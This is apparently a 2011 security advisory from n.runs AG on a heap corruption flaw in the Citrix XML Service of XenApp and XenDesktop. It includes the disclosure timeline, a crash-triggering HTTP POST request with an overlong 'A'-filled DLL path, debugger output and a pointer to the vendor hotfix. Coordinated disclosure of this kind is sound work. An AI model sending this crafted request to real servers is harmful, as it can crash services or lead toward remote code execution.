n.runs AG http://www.nruns.com/ security(at)nruns.com n.runs-SA-2011.002 28-Jul-2011 ___________________________________________________________________________ Vendor: Citrix, http://www.citrix.com Affected Products: XenApp and XenDesktop Affected Version: See the Citrix security bulletin [2] for a list Vulnerability: Heap Corruption in Citrix XML Service Risk: HIGH ___________________________________________________________________________
Vendor communication:
2011/04/26 Initial notification and request for PGP key 2011/04/26 Received PGP key. Sent detailed vulnerability description 2011/04/27 Confirmed receival / request for more version/patch information 2011/05/31 Received request for exploit code for reproduction 2011/06/02 n.runs provides Citrix with PoC exploit code 2011/07/12 n.runs requests status update 2011/07/15 Confirmation that issue was identified and patches are scheduled 2011/07/27 Citrix publishes bulletin and hotfix
___________________________________________________________________________
Overview:
A heap corruption vulnerability has been found in the Citrix XML Service of XenApp and XenDesktop which is installed on every server used for sharing applications. Successful exploitation allows arbitrary code execution on the server running the XML service.
Successful exploitation may allow arbitrary code execution on the server running the XML service. The issue can be triggered with network access to the system running the XML service.
Description:
The Citrix XML Service (ctxxmls.exe) is installed on every server used for sharing applications. This windows service listens by default on port 80 and can receive HTTP requests. Using HTTP POST requests with a URL starting with the path /scripts/ it is possible to send messages to so called "HTTP Extension DLLs" which consist of XML markup.
By sending a POST request to a really long non-existent extension DLL some form of heap corruption can be triggered. A request of the following format was sent:
POST /scripts/AAAAAAAAAA[...]AAAAAAAAA.dll HTTP/1.1 Content-Type: text/xml Host: localhost:80 Content-Length: 1234 Connection: Keep-Alive
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE NFuseProtocol SYSTEM "NFuse.dtd"> <NFuseProtocol version="5.1"> <RequestValidateCredentials> <Credentials> <UserName>nruns</UserName> <Password encoding="ctx1">MLBMMMAHNB</Password> <Domain type="NT">TEST</Domain> </Credentials> </RequestValidateCredentials> </NFuseProtocol
Around 122.222 'A' characters were sent in our tests which triggered the heap corruption. But repeated tests showed that the observed behavior could not be triggered reliably and sometimes needed multiple tries until a crash was encountered.
The following Windbg output shows the observed crash of the XML service:
(b68.1020): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=009bfdac ecx=009bfd00 edx=00000000 esi=43434342 edi=00000000 eip=7c82ae6e esp=009bfd60 ebp=009bfd90 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 ntdll!RtlImageNtHeaderEx+0x64: 7c82ae6e 66813e4d5a cmp word ptr [esi],5A4Dh ds:0023:43434342=???? *** ERROR: Module load completed but symbols could not be loaded for ctxxmlss.exe 0:001> kb ChildEBP RetAddr Args to Child 009bfd90 7c82aeec 00000001 43434342 00000000 ntdll!RtlImageNtHeaderEx+0x64 009bfdb0 77e703ba 43434342 00000000 00c00048 ntdll!RtlImageNtHeader+0x1b 009bfdc4 00402eda 43434343 00000001 00324628 kernel32!FreeLibrary+0x1b WARNING: Stack unwind information not available. Following frames may be wrong. 009bfee4 004033a4 0032463a 0001dd77 00000015 ctxxmlss+0x2eda 009bff10 004027e4 00c3806e 009bff38 00324628 ctxxmlss+0x33a4 009bff30 00402a88 ffffffff 00324a48 009bff60 ctxxmlss+0x27e4 009bff40 00403a9a 00012cbd 00324628 00000002 ctxxmlss+0x2a88 009bff60 00403be7 00324a48 00000000 00324918 ctxxmlss+0x3a9a 009bff78 00403c2f 00322580 009bffb8 7c349565 ctxxmlss+0x3be7 009bff84 7c349565 00322580 00000000 00000000 ctxxmlss+0x3c2f 009bffb8 77e6482f 00324880 00000000 00000000 MSVCR71!_threadstartex+0x6f [f:\vs70builds\3052\vc\crtbld\crt\src\threadex.c @ 241] 009bffec 00000000 7c3494f6 00324880 00000000 kernel32!BaseThreadStart+0x34
Impact:
The exploitability of this issue was not verified but it is to be expected that it can be exploited reliably with more time investments which would then lead to arbitrary remote code execution.
Solution:
Citrix issued a hotfix for this issue which can be found at [2].
___________________________________________________________________________
Credit: Bug found by Alexios Fakos and Moritz Jodeit of n.runs AG. ___________________________________________________________________________
References: [1] http://www.citrix.com/ [2] http://support.citrix.com/article/CTX129430
This Advisory and Upcoming Advisories: http://www.nruns.com/security_advisory.php
|